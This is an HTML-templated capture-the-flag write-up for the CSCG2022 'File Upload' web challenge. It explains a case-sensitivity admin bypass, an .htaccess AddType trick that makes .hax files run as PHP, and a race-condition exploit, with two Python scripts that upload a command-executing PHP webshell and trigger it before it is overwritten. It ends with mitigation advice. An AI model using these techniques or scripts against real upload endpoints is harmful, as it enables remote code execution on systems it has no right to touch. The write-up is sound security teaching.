{% extends "base.html" %}

{% block title %}File Upload{% endblock %}

{% block content %}

<h1>File Upload - CSCG2022</h1>

<p>
    <b>Category:</b> Web <br/>
    <b>Difficulty:</b> Easy <br/>
    <b>Author:</b> Kolja <br/>
</p>

<!--
<a href="https://sw1tchbl4d3.com/writeups/2022/cscg/file-upload">Read it on my website! (once I'm allowed to upload it!)</a>
-->

<h2>Recon</h2>

<p>
    We are given a zip file, <a href="/static/files/cscg2022/file-upload.zip"><code>file-upload.zip</code></a>, containing a simple website with dockerfiles. <br/>
    We are also provided with a server running this website.
</p>

<p>
    Visiting the website redirects us to a login page, with an optional sign up link. <br/>
    If we register an account and log in with it, the site gives us an upload page. <br/>
    However, we can't use our newly registered account as the upload function is restricted to admin users. <br/>
    That's pretty much everything we can check with the live version, so let's dig into the code!
</p>

<p>
    At first, let's look at the place where we got stuck, which is the restricted upload function. <br/>
    We can find the corresponding php file in <code>webserver/src/upload.php</code>. <br/>
    And here we can see the admin check.
</p>

<img src="/static/img/writeups/cscg2022/file-upload1.png">

<p>
    On line 24, the code make an SQL query to check if the current user has a staff flag set, and if not, abort the upload. <br/>
    Initially, there's seemingly no obvious way around this check. <br/>
    So perhaps we could head to the login function and try to find an exploit there? <br/>
    Here we can see something interesting.
</p>

<img src="/static/img/writeups/cscg2022/file-upload2.png">

<p>
    At a first glance, this looks like a normal sql query, simply looking for a user in the database. <br/>
    But what exactly does the <code>BINARY</code> statement do? <br/>
    In SQL, if you specify BINARY before a certain key you want to look for, that key will then be matched case sensitively. <br/>
    Usually, the users <code>admin</code>, <code>Admin</code>, and even <code>AdMiN</code> would be treated the same in SQL, at least without the <code>BINARY</code> keyword. <br/>
    This keyword also appears in the register function, but if we look back at the staff check, there's no <code>BINARY</code> to be found. <br/>
    So, how exactly could we abuse this?
</p>

<p>
    In this regard, login and register are case sensitive while the check isn't <br/>
    If we take a look at the sql.sql file, we can see that a user called <code>administrator</code> is created at startup. <br/>
    This means, that if we create a user called <code>Administrator</code>, the register and login code will then see it as a different user. <br/>
    This is because the first “A” in the word is now capitalized which the <code>BINARY</code> statement will pick up. <br/>
    However, the checking function will think that our newly created user is the same admin user created at startup <br/>
    This way we can get through the check!
</p>

<p>
    So, now that we're at the upload page, why not just upload a php file that would get the flag for us? <br/>
    Well, if we take another look at the <code>upload.php</code> file, you'll notice that there are a few more checks we will have to deceive.
</p>

<img src="/static/img/writeups/cscg2022/file-upload3.png">

<p>
    As the <code>bad_extensions</code> array here contains the extensions <code>["php", "phtml", "pht"]</code>, we cannot simply upload a <code>php</code> file. <br/>
    Is there any other way to get code execution, without the php extension? <br/>
    Indeed, there is with the help of <a href="https://github.com/wireghoul/htshells"><code>htshells</code></a>. <br/>
    These abuse the <code>.htaccess</code> file found on many servers to control access to certain files on the webserver. <br/>
    What these can also do is make the server see one file format as another. <br/>
    For example, we can tell the server that the extension <code>.hax</code> is actually a PHP file, and it will happily accept it.
</p>

<p>
    As such, the first step in our plan would be upload an htaccess file which makes the server think <code>.hax</code> is actually <code>.php</code>. <br/>
    Then, we will have to upload a php shell, with the extension <code>.hax</code>. <br/>
    If we then request this file, the server should execute our code. <br/>
    Although there is still one last check which makes this entire process a bit harder.
</p>

<img src="/static/img/writeups/cscg2022/file-upload4.png">

<p>
    Here, the server checks for the string <code>&lt;?</code> in the uploaded file, and if successful the server will then overwrite the whole file which will destroy the shell. <br/>
    Though there's one small oversight with this check.
</p>

<img src="/static/img/writeups/cscg2022/file-upload5.png">

<p>
    The uploaded file gets put onto the server in line 63, and gets overwritten later in line 74. <br/>
    This opens the door to an issue called a <code>Race Condition</code>. <br/>
    Because, theoretically, we could access the shell after the file was uploaded, but before it gets overwritten, right inbetween that code. <br/>
    For that to work we'll have to buy ourselves some time by making the search for the <code>&lt;?</code> string take much longer which we can achieve by simply making the file we upload bigger. <br/>
</p>

<h2>Exploitation</h2>

<p> 
    With this idea in mind, the final plan is as follows: <br/>
    1) Create an <code>Administrator</code> user to fool the check <br/>
    2) Upload a malicious <code>.htacces</code> file which makes the server think <code>.hax</code> == <code>.php</code> <br/>
    3) Upload a <code>.hax</code> file with the shell in it. <br/>
    4) Finally, access the <code>.hax</code> file to execute our code. <br/>
    The first two steps can be done manually while the last two require scripts, as race conditions can be finnicky at times and will need multiple tries to be successful. <br/>
    To which, we will need to be quick or else we won't be able to make that time window.
</p>

<p>
    The first step is relatively simple, register the account, and log into it, then upload an <code>.htaccess</code> file with the following contents: <br/>
    <code>AddType application/x-httpd-php .hax</code> <br/>
    This lets the <code>.hax</code> file extension be associated with the PHP file type, which in turn makes the server think that <code>.hax</code> files have PHP code in them. <br/>
    Then, we copy the session token from our browser to put it into the upload script here:
</p>

<div class="codeblock">
    <pre class="codeblock_to_be_rendered">
import requests
import random

COOKIES = {"PHPSESSID": "e1e2ae163f2696d8617c7e1e4bfde4c1"}
HAX = "<?= system(\"cat /flag*\"); ?>"

BASE = "https://YOUR-CSCG-SESSION-file-upload.challenge.master.cscg.live:31337"

i = 0

while True:
    try:
        FILES = {"fileToUpload": ("cool.hax", "A\n"*random.randint(10000, 100000) + HAX)}

        y = requests.post(BASE + "/upload.php", files=FILES, cookies=COOKIES, timeout=1)

        print(y.status_code, i)

        i += 1
    except Exception:
        continue
    </pre>
</div>

<p>
    All this script does is upload the file <code>cool.hax</code> over and over again, with varying amounts of <code>A</code>'s prepended to it in order to slow down the search. <br/>
    The second step is to then execute this continually uploaded shell.
</p>

<div class="codeblock">
    <pre class="codeblock_to_be_rendered">
import requests

BASE = "https://YOUR-CSCG-SESSION-file-upload.challenge.master.cscg.live:31337"

i = 0

while True:
    try:
        y = requests.get(BASE + "/uploads/cool.hax", timeout=1)

        print(y.status_code, i)
        if not "Nice" in y.text:
            print(y.text)
            exit(1)

        i += 1
    except Exception:
        continue
    </pre>
</div>

<p>
    This script requests the newly uploaded file until it finds that the file has been successfully executed. <br/>
    We can check this by looking for the "Nice try hackers!" string our shell gets replaced with when the upload fails.
</p>

<p>
    If we now run both scripts against the server, after some time, the flag will appear!
</p>

<img src="/static/img/writeups/cscg2022/file-upload6.png">

<p>
    Yes, yes we did!
</p>

<h2>Mitigations</h2>

<p>
    There have been multiple points of failure here which all could have been mitigated. <br/>
    For one, be consistent with case sensitivity. <br/>
    Either make all queries <code>BINARY</code> or none, so this discrepancy which lead to account takeover cannot happen. <br/>
    The second mitigation: check the file *before* fully uploading it to the server. <br/>
    The server should check the data of the query before moving it into a public directory. <br/>
    And my last mitigation: use whitelists instead of blacklists. <br/>
    If the extension blacklist was a whitelist of image formats, the .htaccess file couldn't have been uploaded. <br/>
</p>

<p>~sw1tchbl4d3, 29/05/2022 (dd/mm/yyyy)</p>

{% endblock %}